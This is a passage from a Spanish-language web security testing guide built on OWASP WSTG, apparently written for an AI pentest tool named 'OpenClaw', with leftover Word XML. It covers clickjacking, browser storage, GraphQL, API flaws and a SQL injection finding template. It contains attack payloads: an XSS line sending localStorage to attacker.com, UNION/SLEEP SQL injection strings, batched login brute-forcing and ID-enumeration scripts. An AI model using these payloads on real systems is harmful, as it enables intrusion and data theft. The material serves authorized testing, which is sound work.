width: 100%; height: 100%;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opacity: 0.0; z-index: 2; }  /* invisible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#decoy  { position: absolute; top: 200px; left: 150px; z-index: 1;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&lt;/style&gt;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&lt;/head&gt;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&lt;body&gt;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&lt;!-- App objetivo embebida (invisible)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&lt;iframe id='target' src='https://objetivo.com/account/delete'&gt;&lt;/iframe&gt;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&lt;!-- Boton de senouelo visible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&lt;button id='decoy'&gt;Haz click para reclamar tu premio!&lt;/button&gt;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&lt;/body&gt;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&lt;/html&gt;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si se puede embeber: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-I https://objetivo.com | grep -i 'x-frame\|content-security'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SEGURO: X-Frame-Options: DENY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SEGURO: Content-Security-Policy: frame-ancestors 'none'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VULNERABLE: sin ninguno de estos headers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4.11.12 Browser Storage (WSTG-CLNT-12)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Inspeccion de datos en almacenamiento del navegador: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En DevTools del navegador (Console):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 contenido de localStorage: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JSON.stringify(localStorage)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Resultado INSEGURO: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{"access_token":"eyJhbGciOiJIUzI1NiJ9...", "user_data":"{"id":1,"role":"admin","email":"..."}"}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 sessionStorage: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JSON.stringify(sessionStorage)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 cookies accesibles desde JS (indica ausencia de HttpOnly):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document.cookie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IndexedDB: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indexedDB.databases().then(dbs =&gt; console.log(dbs))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Datos que NUNCA deben estar en localStorage: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- Tokens de autenticacion (usar cookies HttpOnly)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- Informacion de tarjeta de credito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- Claves de cifrado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- Datos PII no cifrados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hay XSS, robar localStorage completo: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fetch('https://attacker.com/?d='+btoa(JSON.stringify(localStorage)))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Seguridad del Cliente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 XSS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sources-&gt;sinks no sanitizados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DOMInvader / dalfox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JavaScript Execution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eval() controlable por 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 source analysis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 Injection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HTML arbitrario inyectable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 payloads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Redirect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Redirecciones con whitelist validada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redirect= param test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CSS Injection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CSS inyectable por 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CSS payloads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Politica CORS restrictiva y correcta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Origin spoofing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Clickjacking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X-Frame-Options / CSP frame-ancestors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iframe PoC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 y validacion en conexiones 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 interceptor Burp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postMessage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Validacion de origin en eventos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postMessage PoC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Storage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datos sensibles en localStorage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DevTools inspection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CLNT-13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XSSI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Endpoints JSON con Access-Control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Cross-origin include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13. Pruebas de API (WSTG 4.12)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4.12.1 GraphQL (WSTG-APIT-01)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Reconocimiento de GraphQL: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Endpoints comunes de GraphQL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/graphql   /api/graphql   /v1/graphql   /query   /gql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Verificar si existe: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-X POST https://objetivo.com/graphql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-H "Content-Type: application/json"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-d '{"query":"{ __typename }"}'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 si existe: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{"data":{"__typename":"Query"}}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Introspection — descubrir toda la API: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Query de introspection completa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curl -X POST https://objetivo.com/graphql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-H "Content-Type: application/json"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-d '{"query": "{ __schema { types { name fields { name type { name } } } } }"}'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devuelve el schema completo =&gt; MEDIO: introspection habilitada en produccion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Permite descubrir tipos, campos, mutaciones y consultas disponibles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Herramienta grafica: GraphQL Voyager para visualizar el schema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Herramienta: InQL Burp plugin para analisis automatico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Ataques de depth y batching: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Query profunda (DoS por complejidad):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 user { friends { friends { friends { friends { name email } } } } }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el servidor no limita la profundidad y tarda N segundos =&gt; DoS posible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Batching para bypass de rate limiting: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En lugar de 1 peticion de login, enviar 100 en un batch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[{"query": "mutation { login(user: \"admin\", pass: \"pass1\") { token } }"},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{"query": "mutation { login(user: \"admin\", pass: \"pass2\") { token } }"},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{"query": "mutation { login(user: \"admin\", pass: \"pass100\") { token } }"}]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el servidor no detecta el batch como multiples intentos =&gt; bypass de lockout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D5E8F0" w:sz="3" w:space="1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APIs REST — Vulnerabilidades comunes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BOLA (Broken Object Level Authorization) — la vuln de API mas comun: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Documentado por OWASP API Security Top 10 como API1:2023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Escenario: endpoint de ordenes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/api/v1/orders/1001   Authorization: Bearer TOKEN_USER_A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Respuesta: {"id":1001, "user_id":100, "total":99.99, "items":[...]}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Ataque BOLA: usar token de A para acceder a ordenes de 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/api/v1/orders/1002   Authorization: Bearer TOKEN_USER_A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responde con datos de otro usuario =&gt; CRITICO: BOLA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Script de BOLA testing automatico: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for order_id in $(seq 1000 1100); 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status=$(curl -s -o /dev/null -w '%{http_code}'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-H 'Authorization: Bearer TOKEN_USER_A'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https://objetivo.com/api/v1/orders/$order_id)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echo "Order $order_id: HTTP $status"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done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Mass Assignment — campos extra aceptados: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Registro normal de usuario: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/api/v1/users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{"name": "John Doe", "email": "john@test.com", "password": "Pass1234!"}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Ataque Mass Assignment — agregar campo 'role':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/api/v1/users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{"name": "John Doe", "email": "john@test.com", "password": "Pass1234!", "role": "admin"}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el usuario creado tiene rol admin =&gt; CRITICO: Mass Assignment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Otros campos a intentar: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{"isAdmin": true, "is_staff": true, "verified": true, "credits": 9999}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{"account_balance": 10000, "subscription": "premium", "email_verified": true}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Versiones antiguas de API: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La v2 puede tener controles de seguridad que la v1 no tiene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/api/v2/users/100      # Retorna 403 Forbidden (bien configurada)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/api/v1/users/100      # Retorna 200 OK con datos completos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Variaciones a probar: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/api/v1/      /api/v2/      /api/v3/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/v1/          /v2/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/api/beta/    /api/dev/     /api/internal/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/api/legacy/  /api/old/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Documentacion expuesta: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/swagger-ui.html       # Swagger UI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/api-docs              # Swagger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/openapi.json          # OpenAPI spec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/api/v1/docs           # Documentacion API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2E75B6" w:sz="6"/>
              <w:bottom w:val="single" w:color="2E75B6" w:sz="2"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="EAF0FB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Si devuelve 200 sin autenticacion =&gt; Expone toda la estructura de la API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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CHECKLIST — API Testing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2650"/>
        <w:gridCol w:w="220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OpenClaw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APIT-01a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GraphQL introspection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Introspection deshabilitada en prod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GraphQL query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APIT-01b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GraphQL depth/complexity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Limites de depth activos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Nested queries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APIT-01c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GraphQL batching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 no bypasseable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Batch requests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APIT-02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BOLA en REST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IDs verificados por ownership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Cross-user ID test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APIT-03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Mass Assignment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Campos extra ignorados en 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 field injection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APIT-04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Versiones antiguas de API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v1/beta deprecadas y sin acceso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 enumeration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APIT-05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 en todos los endpoints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endpoints sin autenticacion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Unauth requests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APIT-06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vulnerabilidades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Algoritmo fuerte, firma validada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jwt_tool.py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APIT-07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limiting en API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Limite de peticiones aplicado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Flood test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APIT-08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 expuestas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Swagger/OpenAPI requiere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 endpoint check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14. Clasificacion de Hallazgos y Reporte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Tabla de Severidad CVSS v3.1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37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Ejemplos tipicos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9.0-10.0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RCE sin auth, SQLi en login, SSRF a metadatos cloud, upload de webshell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RCE, SQLi full, XXE con lectura /etc/passwd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7.0-8.9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Autenticacion bypasseable, IDOR masivo, XSS almacenado en admin, CSRF critico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IDOR, Stored XSS admin, Auth bypass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4.0-6.9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XSS reflejado, CSRF en accion no critica, enumeracion de usuarios, TLS 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Reflected XSS, CSRF cambio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0.1-3.9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Headers de seguridad ausentes, HSTS ausente, dir listing sin info sensible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Missing headers, verbose errors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practices, mejoras recomendadas sin impacto directo de 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version disclosure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Template de Reporte de Hallazgo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 / Ejemplo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 de Hallazgo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FIND-2026-001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Titulo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Inyeccion SQL en parametro 'id' del endpoint /api/products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Categoria OWASP / CWE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WSTG-INPV-05 / CWE-89 / OWASP A03:2021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Severidad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CVSS 3.1 Score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9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)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URL afectada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https://objetivo.com/api/products?id=1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Metodo HTTP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Parametro vulnerable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 (query parameter)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parametro 'id' del endpoint /api/products no sanitiza la entrada antes de construir la consulta SQL. Permite inyeccion de SQL que resulta en acceso no autorizado a la base de datos completa.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Pasos de reproduccion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Navegar a https://objetivo.com/api/products?id=1
2. Modificar el parametro: id=1' AND SLEEP(5)--
3. Observar que la respuesta tarda 5 segundos adicionales (time-based SQLi)
4. Extraer version de BD: id=1' UNION SELECT version(),NULL--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Payload utilizado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1' UNION SELECT table_name,NULL FROM information_schema.tables--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Evidencia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[Screenshot/Response adjunto - revelar nombre de tablas: users, payments, sessions]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Impacto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Confidencialidad: ALTA - acceso a todos los datos de la BD
Integridad: ALTA - posible modificacion/eliminacion de datos
Disponibilidad: MEDIA - posible eliminacion de tablas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Remediacion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Usar prepared statements o consultas parametrizadas. Ejemplo en PHP: $stmt = $pdo-&gt;prepare('SELECT * FROM products WHERE id = ?'); $stmt-&gt;execute([$id]);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Referencias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CWE-89: Improper Neutralization of Special Elements used in an SQL Command
https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection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Fecha de descubrimiento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2026-03-03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Fecha limite de remediacion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2026-03-05 (24-48h para CRITICA)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15. Flujo de Trabajo con OpenClaw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Etapas del Engagement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0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Acciones OpenClaw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del Analista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Planificacion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Recibir scope, configurar headers base, configurar proxy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Definir alcance, firmar reglas de compromiso, autorizar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Recoleccion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Ejecutar INFO-01 a INFO-10 en orden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Revisar hallazgos, ampliar vectores de interes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Modelado de amenazas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Generar superficie de ataque con los datos de fase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Validar y priorizar vectores de mayor riesgo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Config &amp; Crypto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Ejecutar CONF-01 a CONF-11 y CRYP-01 a CRYP-04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Dirigir orden, authorizar escaneos de puertos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 &amp; Session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Ejecutar ATHN y SESS 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Proveer credenciales de prueba, revisar sesiones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Inyecciones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Ejecutar INPV-01 a INPV-19 en todos los entry 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Autorizar cada payload critico (SQLi destructivo, RCE)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Logica &amp;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Ejecutar BUSL y APIT con contexto de negocio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Explicar flujos de negocio criticos a OpenClaw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Explotacion controlada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Generar PoC verificado para cada hallazgo confirmado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Autorizar cada PoC, definir profundidad de explotacion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Post-explotacion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Evaluar impacto real y cadenas de vulnerabilidades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Definir limites de pivoting, autorizar movimiento lateral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Generar reporte tecnico con evidencias y templates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Revisar, validar, completar con contexto de negocio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remediaciones implementadas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Aprobar cierre o escalar si remediacion es insuficiente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Comandos / Prefijos de Comunicacion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Prefijo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SCOPE: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o modifica el alcance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SCOPE: incluir subdominio api.objetivo.com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Ejecutar prueba especifica WSTG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 WSTG-INPV-05 en endpoint /login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ANALYZE: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Analizar respuesta o hallazgo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ANALYZE: esta respuesta HTTP 500 con stacktrace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POC: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Generar prueba de concepto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POC: para SQLi encontrada en /api/products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Generar template de hallazgo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REPORT: SQLi critica con CVSS 9.8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STOP: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Detener actividad inmediatamente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STOP: pausar todas las pruebas activas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RETEST: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remediacion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RETEST: SQLi en /api/products despues del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SUMMARY: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Resumen del estado actual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SUMMARY: hallazgos hasta el momento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ESCALATE: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Marcar hallazgo critico urgente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ESCALATE: RCE encontrado en /upload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CHAIN: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Encadenar vulnerabilidades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CHAIN: XSS + CSRF para escalada de privilegios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16. Checklist Maestra de Engagement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700"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="5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est.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4.1 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Recoleccion de Informacion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1-2 horas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4.2 CONF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Configuracion y Despliegue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2-3 horas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4.3 IDNT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 Identidad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hora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4.4 ATHN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2-3 horas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4.5 ATHZ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Autorizacion / IDOR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2-4 horas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4.6 SESS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 Sesion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2-3 horas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4.7 INPV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Validacion de Entrada (SQLi, XSS, etc.)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19+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4-8 horas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4.8 ERRH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Manejo de Errores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4.9 CRYP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hora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4.10 BUSL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Logica de Negocio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2-4 horas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4.11 CLNT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 del Cliente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2-3 horas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4.12 APIT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Testing de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8+ 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2-4 horas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600" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="1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Guia de Pruebas de Seguridad Web — OWASP WSTG v4.2 adaptado para OpenClaw — Uso confidencial interno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Guia de Pruebas de Seguridad Web — OpenClaw — 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2026-03-03T17:29:01.009Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-03T17:29:01.010Z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